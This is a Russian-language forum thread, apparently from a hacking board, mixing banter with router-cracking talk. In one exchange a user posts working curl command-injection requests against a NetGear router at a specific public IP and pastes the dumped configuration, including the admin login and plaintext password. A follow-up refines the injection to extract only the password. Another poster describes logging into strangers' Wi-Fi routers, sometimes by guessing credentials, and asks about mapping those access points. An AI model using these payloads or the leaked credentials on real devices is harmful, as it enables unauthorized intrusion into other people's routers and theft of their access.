Тут ничего не скажешь, не нужно ничего придумывать. "дайте мне сразу всё, а я ещё и пожурю за недостаток горячей воды в ванне" Тьфу блин.
Эхх Алекс, нам ли жить в печали?! Вы всё думаете о праведности, чести. Не надо, не стоит. Поверьте старому пердуну. Самое главное, что бы вас на кладбон(кладбище) было кому нести, а ещё кому плакать при этом. Жуть.
Ребята, не поймите привратно. Был тут некий человек "Wifiadapter". Написал весьма прекрасную программку работы с текстовыми строками под окна и .. пропал. Может кто знает о судьбе его? C селекцией и удалением дубликатов были проблемы(памяти не хватало), но всё можно было решить с виртуалкой или работой с диском... Блин, то что он успел накодить прежде чем ушёл в ночь, уже класcно. Ежели кто с ним знаком, будьте добры сказать что его вызывают.
во-во...я тоже пострадавший. меня так на сайте обманули, что до сих пор не могу с этого форума уйти.уже психологическая зависимость как от курева. спасайтесь уважаемый. вам еще не поздно....
таки шоб нет - так да. таки знают, но скрывают. для себя придержали. ежели всем сразу раскрывать тайны ввода пароля - так на форум никто и не заглянет. а тут глядишь и посещаемость повышается
Девушки порой такие скрытные: "Имя: Екатерина. Фамилия: скрыто. Дата рождения: скрыто. е-mаil: ivаnovа1992мэйл.ру"
@binarymaster Роутеры NetGear подвержены серьезной уязвимости https://habrahabr.ru/company/eset/blog/317420/ Такого промаха давно не видел.
Мне удалось получить пароль от web-интерфейса (срабатывает не всегда с первого раза): Code: curl 'https://73.136.ll2.174:8443/cgi-bin/;grep$IFS-m30$IFS"ht"$IFS`pwd`dev`pwd`mtd1' -k Spoiler: Ответ Code: <...здесь начало скрипта...> return "WinPhone"; } return "Win"; } return "None"; } pci/2/1/rxgains5ghtrisoa0=5 pci/2/1/rxgains5ghtrisoa1=4 pci/2/1/rxgains5ghtrisoa2=4 x_claimed_url=https://registration.ngxcld.com/registration/status x_register_url=https://registration.ngxcld.com/registration/register vht_tkip_reject=1 http_wanport= leafp2p_remote_url=http://peernetwork.netgear.com/peernetwork/services/LeafNetsWebServiceV2 schedule_daylightadjust=0 x_advisor_url=https://advisor.ngxcld.com/advisor/direct http_username=admin http_rmenable=1 http_lanport=80 leafp2p_replication_url=https://readyshare.netgear.com/device/entry http_rmstartip=0.0.0.0 http_passwd=Sammie1! usb_wan_http_port=443 usb_wan_http_protect_enable=1 http_timeout=5 http_rmport=8443 x_discovery_url=https://presence.ngxcld.com/presence/presence restart_httpd=0 pppoe2_authtype=0 usb_http_enable=1 usb_wan_http_enable=0 leafp2p_replication_hook_url=https://readyshare.netgear.com/device/hook pci/2/1/rxgains5ghtrelnabypa0=1 pci/2/1/rxgains5ghtrelnabypa1=1 pci/2/1/rxgains5ghtrelnabypa2=1 genie_remote_url=https://genieremote.netgear.com/genie-remote/claimDevice Хотелось бы так: Code: curl 'https://73.136.ll2.174:8443/cgi-bin/;grep$IFS"http_passwd"$IFS`pwd`dev`pwd`mtd1' -k но почему-то не срабатывает.
Вот так вроде то, что надо (grep -m1): Code: curl 'https://73.136.112.174:8443/cgi-bin/;grep$IFS-m1$IFS"http_passwd"$IFS`pwd`dev`pwd`mtd1' -k
Здравствуйте! А вот такой вопрос. Есть программа. Это прекрасно, если люди добавляют в базу, и точки находятся на карте. А как быть с теми точками, пароли к которым люди находят в ветке https://forum.antichat.ru/threads/435763/ Вот если есть название точки,мак, пин( получила, зашла на роутер ( так же получив логин /пароль к роутеру, иногда методом тыка ), и я знаю, где территориально находится эта точка. Я могу её самостоятельно добавить на карту (поставить метку)? Если уже отвечали на данный вопрос - прошу прощения, если можно - дайте ссыль на ответ)
понятно, что... мало кто это будет делать, но все же. Меня волнует - предусмотрена ли возможность вручную вносить инфу о точке